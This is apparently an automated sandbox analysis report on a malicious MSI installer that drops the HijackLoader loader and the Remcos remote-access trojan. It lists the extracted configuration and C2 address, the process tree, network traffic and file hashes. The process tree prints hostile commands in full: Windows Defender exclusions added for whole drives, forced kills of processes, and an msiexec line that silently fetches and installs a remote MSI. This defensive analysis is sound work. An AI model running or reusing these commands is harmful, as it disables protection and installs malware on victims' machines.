hijackloader | 0f81e4f98ae30a8c891b17872789cd5c0669bec05b6d4f99f9835fbcdb67b0ce

Analysis

max time kernel
149s
max time network
153s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21/02/2025, 22:00 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ThePredictor.msi
Size

27.3MB
MD5

f57bed58fae51b1eb360d11ffb042859
SHA1

18d49f590fec35f5f07a8a9ed7ede776cdfbf412
SHA256

0f81e4f98ae30a8c891b17872789cd5c0669bec05b6d4f99f9835fbcdb67b0ce
SHA512

e71e09070cd37ba84fee17ba47c74c25b1d38408cf94a136cf6f42ee6df50f96d7bc5b33bd49729d5090fdade6e05678175bf49aa9474b1f93f2ea75d8e83f1d
SSDEEP

786432:h6JCD0rr9pQLq9jRbfQrP6sJ/xxLbxGrSU4+u:ArrHQLMf1O/xRorSU

Score

10^/10

hijackloader remcos v2 discovery loader persistence privilege_escalation rat

Malware Config

Extracted

Family

remcos

Botnet

185.157.162.126:1995

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
qsdazeazd-EL00KX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Detects HijackLoader (aka IDAT Loader) 1 IoCs

resource	yara_rule
behavioral2/files/0x000a000000027da6-73.dat	family_hijackloader

HijackLoader
HijackLoader is a multistage loader first seen in 2023.
loader hijackloader
Hijackloader family
hijackloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
3928	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1786400979-876203093-3022739302-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EHttpSrv = "\"C:\\Users\\Admin\\AppData\\Local\\IXXinstall\\EHttpSrv.exe\""	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3640	msiexec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1786400979-876203093-3022739302-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1786400979-876203093-3022739302-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1786400979-876203093-3022739302-1000\Control Panel\International\Geo\Nation	cscript.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 324 set thread context of 4280	324	EHttpSrv.exe	106
PID 4280 set thread context of 1088	4280	cmd.exe	110

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\sev\dev\Firefox Installer.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\ScreenRec_webinstall_all.exe	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\lola.bat	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\task.vbs	msiexec.exe
File created	C:\Program Files (x86)\sev\dev\updt\BvSshClient-Inst (1).exe	msiexec.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File created	C:\Windows\Installer\SourceHash{0472DF57-ADC2-4F69-A007-A10C1075D56D}	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE20F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e579ec0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9FBA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA25C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA2EA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA58B.tmp	msiexec.exe
File created	C:\Windows\Installer\e579ec0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB8E0.tmp	msiexec.exe
File created	C:\Windows\Installer\e58e194.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA1CF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Executes dropped EXE 1 IoCs

pid	Process
324	EHttpSrv.exe

Loads dropped DLL 7 IoCs

pid	Process
4540	MsiExec.exe
4540	MsiExec.exe
4540	MsiExec.exe
4540	MsiExec.exe
324	EHttpSrv.exe
324	EHttpSrv.exe
1088	EHttpSrv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
1012	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EHttpSrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EHttpSrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 2 IoCs

defense_evasion

pid	Process
4052	taskkill.exe
1064	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
3300	msiexec.exe
3300	msiexec.exe
232	WMIC.exe
232	WMIC.exe
232	WMIC.exe
232	WMIC.exe
1704	WMIC.exe
1704	WMIC.exe
1704	WMIC.exe
1704	WMIC.exe
3640	msiexec.exe
3640	msiexec.exe
324	EHttpSrv.exe
4280	cmd.exe
4280	cmd.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
324	EHttpSrv.exe
4280	cmd.exe
4280	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1012	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1012	msiexec.exe
Token: SeSecurityPrivilege	3300	msiexec.exe
Token: SeCreateTokenPrivilege	1012	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1012	msiexec.exe
Token: SeLockMemoryPrivilege	1012	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1012	msiexec.exe
Token: SeMachineAccountPrivilege	1012	msiexec.exe
Token: SeTcbPrivilege	1012	msiexec.exe
Token: SeSecurityPrivilege	1012	msiexec.exe
Token: SeTakeOwnershipPrivilege	1012	msiexec.exe
Token: SeLoadDriverPrivilege	1012	msiexec.exe
Token: SeSystemProfilePrivilege	1012	msiexec.exe
Token: SeSystemtimePrivilege	1012	msiexec.exe
Token: SeProfSingleProcessPrivilege	1012	msiexec.exe
Token: SeIncBasePriorityPrivilege	1012	msiexec.exe
Token: SeCreatePagefilePrivilege	1012	msiexec.exe
Token: SeCreatePermanentPrivilege	1012	msiexec.exe
Token: SeBackupPrivilege	1012	msiexec.exe
Token: SeRestorePrivilege	1012	msiexec.exe
Token: SeShutdownPrivilege	1012	msiexec.exe
Token: SeDebugPrivilege	1012	msiexec.exe
Token: SeAuditPrivilege	1012	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1012	msiexec.exe
Token: SeChangeNotifyPrivilege	1012	msiexec.exe
Token: SeRemoteShutdownPrivilege	1012	msiexec.exe
Token: SeUndockPrivilege	1012	msiexec.exe
Token: SeSyncAgentPrivilege	1012	msiexec.exe
Token: SeEnableDelegationPrivilege	1012	msiexec.exe
Token: SeManageVolumePrivilege	1012	msiexec.exe
Token: SeImpersonatePrivilege	1012	msiexec.exe
Token: SeCreateGlobalPrivilege	1012	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeRestorePrivilege	3300	msiexec.exe
Token: SeTakeOwnershipPrivilege	3300	msiexec.exe
Token: SeIncreaseQuotaPrivilege	232	WMIC.exe
Token: SeSecurityPrivilege	232	WMIC.exe
Token: SeTakeOwnershipPrivilege	232	WMIC.exe
Token: SeLoadDriverPrivilege	232	WMIC.exe
Token: SeSystemProfilePrivilege	232	WMIC.exe
Token: SeSystemtimePrivilege	232	WMIC.exe
Token: SeProfSingleProcessPrivilege	232	WMIC.exe
Token: SeIncBasePriorityPrivilege	232	WMIC.exe
Token: SeCreatePagefilePrivilege	232	WMIC.exe
Token: SeBackupPrivilege	232	WMIC.exe
Token: SeRestorePrivilege	232	WMIC.exe
Token: SeShutdownPrivilege	232	WMIC.exe
Token: SeDebugPrivilege	232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	232	WMIC.exe
Token: SeRemoteShutdownPrivilege	232	WMIC.exe
Token: SeUndockPrivilege	232	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1012	msiexec.exe
1012	msiexec.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 3300 wrote to memory of 4540	3300	msiexec.exe	81
PID 3300 wrote to memory of 4540	3300	msiexec.exe	81
PID 3300 wrote to memory of 4540	3300	msiexec.exe	81
PID 3300 wrote to memory of 5000	3300	msiexec.exe	82
PID 3300 wrote to memory of 5000	3300	msiexec.exe	82
PID 5000 wrote to memory of 2208	5000	cmd.exe	84
PID 5000 wrote to memory of 2208	5000	cmd.exe	84
PID 5000 wrote to memory of 536	5000	cmd.exe	85
PID 5000 wrote to memory of 536	5000	cmd.exe	85
PID 536 wrote to memory of 632	536	cscript.exe	86
PID 536 wrote to memory of 632	536	cscript.exe	86
PID 632 wrote to memory of 3840	632	wscript.exe	87
PID 632 wrote to memory of 3840	632	wscript.exe	87
PID 3840 wrote to memory of 232	3840	cmd.exe	89
PID 3840 wrote to memory of 232	3840	cmd.exe	89
PID 632 wrote to memory of 4512	632	wscript.exe	91
PID 632 wrote to memory of 4512	632	wscript.exe	91
PID 4512 wrote to memory of 1704	4512	cmd.exe	93
PID 4512 wrote to memory of 1704	4512	cmd.exe	93
PID 632 wrote to memory of 1756	632	wscript.exe	94
PID 632 wrote to memory of 1756	632	wscript.exe	94
PID 1756 wrote to memory of 4052	1756	cmd.exe	96
PID 1756 wrote to memory of 4052	1756	cmd.exe	96
PID 632 wrote to memory of 4056	632	wscript.exe	98
PID 632 wrote to memory of 4056	632	wscript.exe	98
PID 4056 wrote to memory of 1064	4056	cmd.exe	100
PID 4056 wrote to memory of 1064	4056	cmd.exe	100
PID 632 wrote to memory of 3336	632	wscript.exe	101
PID 632 wrote to memory of 3336	632	wscript.exe	101
PID 3336 wrote to memory of 3928	3336	wscript.exe	102
PID 3336 wrote to memory of 3928	3336	wscript.exe	102
PID 3640 wrote to memory of 324	3640	msiexec.exe	105
PID 3640 wrote to memory of 324	3640	msiexec.exe	105
PID 3640 wrote to memory of 324	3640	msiexec.exe	105
PID 324 wrote to memory of 4280	324	EHttpSrv.exe	106
PID 324 wrote to memory of 4280	324	EHttpSrv.exe	106
PID 324 wrote to memory of 4280	324	EHttpSrv.exe	106
PID 324 wrote to memory of 4280	324	EHttpSrv.exe	106
PID 4280 wrote to memory of 1088	4280	cmd.exe	110
PID 4280 wrote to memory of 1088	4280	cmd.exe	110
PID 4280 wrote to memory of 1088	4280	cmd.exe	110
PID 4280 wrote to memory of 1088	4280	cmd.exe	110
PID 4280 wrote to memory of 1088	4280	cmd.exe	110

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ThePredictor.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1012

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3300
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8BE6B83BEEBFC4609211C43B9C2AC99C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\sev\dev\updt\lola.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2208
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\task.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:632
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3840
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:232
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4512
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im cmd.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1756
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:4052
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im msiexec.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im msiexec.exe
        6⤵
        Kills process with taskkill
        
        PID:1064
    - - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs" //B
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3336
      - C:\Windows\System32\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi" /qn
        6⤵
        Use of msiexec (install) with remote resource
        
        PID:3928

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Adds Run key to start application
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Users\Admin\AppData\Local\IXXinstall\EHttpSrv.exe
  "C:\Users\Admin\AppData\Local\IXXinstall\EHttpSrv.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Users\Admin\AppData\Local\IXXinstall\EHttpSrv.exe
      C:\Users\Admin\AppData\Local\IXXinstall\EHttpSrv.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1088

Network

DNS

raw.githubusercontent.com

msiexec.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi

msiexec.exe

Remote address:

185.199.109.133:443

Request

GET /leinchchanceleinch/jik/refs/heads/main/d.msi HTTP/2.0
host: raw.githubusercontent.com
accept: */*
user-agent: Windows Installer

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "94bbdac30749ff7abc41d46b25015bfeb90d0417f96467876a639eb6a35ce1f7"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: F6D3:121B05:ADA1:17CE7:67B8F785
accept-ranges: bytes
date: Fri, 21 Feb 2025 22:00:59 GMT
via: 1.1 varnish
x-served-by: cache-lon420102-LON
x-cache: HIT
x-cache-hits: 1
x-timer: S1740175260.634216,VS0,VE3
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: b196c321fbae882ab6e7e77ce4b720d7a2eab67a
expires: Fri, 21 Feb 2025 22:05:59 GMT
source-age: 21
content-length: 2994176

185.199.109.133:443

https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi

tls, http2

msiexec.exe

78.7kB
3.1MB
1577
2230

HTTP Request

GET https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi

HTTP Response

200
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

396 B
132 B
5
3
185.157.162.126:1995

tls

EHttpSrv.exe

304 B
92 B
3
2

8.8.8.8:53

raw.githubusercontent.com

dns

msiexec.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.110.133

185.199.108.133

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e579ec3.rbs

Filesize
2KB

MD5
eedafcc337b13876c4ab000a663d1ed1

SHA1
3cb5810e062f28ddcce2e2e518693bf4307bcca6

SHA256
03971d931bad4778ea478b690889c40ac008414d3a661142fa4a2cd9cadd3ffc

SHA512
61c5281e7dac2e4181c65d9fb063c2bf349f4fdbacb2d71052bd4c934c089e3b8e577c78979efc0bf63591b3541b7b76c4f21f5207b3a6495e4f8538faf7c5c7

Download Submit
C:\Config.Msi\e58e193.rbs

Filesize
10KB

MD5
c20fb3656261581c95ffb5967afdbbbd

SHA1
c46599afcde40ac0b1567f21fbe4592a762f907f

SHA256
e0195888dea9924730bc3b899acc6abebe776ed4efad173f5c2aedafcb2484af

SHA512
59f6fb701c285b7d1ac9392f412d8ae300ebb4897606a7672d71af2048dc068507a7b6fe87317f2b8b37be1376b0bdb39989633d6c2dc3c300ea4b17be446f05

Download Submit
C:\Program Files (x86)\sev\dev\updt\lola.bat

Filesize
656B

MD5
73e4aed899a6014299b63ccf9eb520f5

SHA1
4147c2dd9277d64c5ecc9e7782e5d5aa94e56b00

SHA256
01c8cc249b04fee266cf757130dfef5b099cdf03337161a6c7f9346b7d2cb4f0

SHA512
e0ad8e8800908a5e0b60d433997c0cebc0750ae7bee0e7fe51c2e5f7fd61792f0c600c2fe65965b0c2562c61f05773d9106d89d7b2d1fb71eaed0dfbe19b5612

Download Submit
C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs

Filesize
872B

MD5
64dccadec94cfd25ee1ed659b29182b2

SHA1
64bc8bca314a238a900de2092587b07903b08e6c

SHA256
c8c9c931af038f86f25acb8f2e5dd98b01c7fdd41f0a1a3afa44e555f0b976cd

SHA512
adff4899e842137c9d78cd1b0056f3610d442b480e2829a41ad505d7353f59dc9fe50ec6055478ace36e4069e388a279e5ec60ca98751a13a559b40d4c847f93

Download Submit
C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs

Filesize
530B

MD5
f46334bc2aaa5c17f94d9e1a71d313ad

SHA1
635bd3cd09045731691a446a82b9a30cb244ce8b

SHA256
3568b9a14ec94a3e7ee267124e3eaea38b6d49019988f5e68dc2fbc16057acaa

SHA512
e8f5216fe65fdbd8b81e2f14b2d40b11be6d5806262ee98292c7bf962ae22a5fb99fb4b58556953d4d6e78be332c0c2cff9b642ee9496dcf62fee452955da0ef

Download Submit
C:\Program Files (x86)\sev\dev\updt\task.vbs

Filesize
2KB

MD5
be8e86dd465192f94e52b2cf7bb6243a

SHA1
e62cfcee783511bf7aa2411564b856967a185749

SHA256
99d59c98978a5f883d3c69c9c6352311e07cb4b9ff0cd6ee96cd9fa6057b5a53

SHA512
fd1ab9e90af36cbed8b46115288a8868500bfde0cbe9b72a9b1b9801cebc2acb0829d9cadf97e7cd70b6322afd65df2965a51a11672458251ff63cd535b17cb2

Download Submit
C:\Users\Admin\AppData\Local\IXXinstall\EHttpSrv.exe

Filesize
20KB

MD5
9329ba45c8b97485926a171e34c2abb8

SHA1
20118bc0432b4e8b3660a4b038b20ca28f721e5c

SHA256
effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659

SHA512
0af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc

Download Submit
C:\Users\Admin\AppData\Local\IXXinstall\MFC80U.DLL

Filesize
1.0MB

MD5
686b224b4987c22b153fbb545fee9657

SHA1
684ee9f018fbb0bbf6ffa590f3782ba49d5d096c

SHA256
a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36

SHA512
44d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875

